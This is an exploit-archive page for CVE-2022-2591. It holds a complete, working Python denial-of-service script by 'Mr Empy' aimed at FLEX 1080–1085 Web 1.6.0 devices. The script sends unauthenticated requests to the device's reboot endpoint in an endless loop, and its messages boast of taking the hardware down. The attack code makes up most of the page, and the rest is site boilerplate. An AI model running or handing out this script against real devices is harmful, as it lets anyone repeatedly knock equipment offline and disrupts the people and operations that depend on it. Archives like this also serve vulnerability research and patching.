FLEX Denial Of Service

2023.05.21
Credit: Mr Empy
Risk: Medium
Local: Yes
Remote: No
CVE: CVE-2022-2591
CWE: CWE-404

# Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service # Date: 2023-05-06 # Exploit Author: Mr Empy # Vendor Homepage: https://www.tem.ind.br/ # Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94 # Version: 1.6.0 # Tested on: Android # CVE ID: CVE-2022-2591 #!/usr/bin/env python3 import requests import re import argparse from colorama import Fore import time def main(): def banner(): print(''' ________ _______ __ / ____/ / / ____/ |/ / / /_ / / / __/ | / / __/ / /___/ /___ / | /_/ /_____/_____//_/|_| [FLEX 1080 < 1085 Web 1.6.0 - Denial of Service] ''') def reboot(): r = requests.get(f'http://{arguments.target}/sistema/flash/reboot') if 'Rebooting' in r.text: pass else: print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware não é vulnerável') quit() banner() print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX} Iniciando o ataque') while True: try: reboot() print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX} Hardware derrubado com sucesso!') time.sleep(1) except: # print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware está inativo') pass if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-t','--target', action='store', help='Target', dest='target', required=True) arguments = parser.parse_args() try: main() except KeyError: quit()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top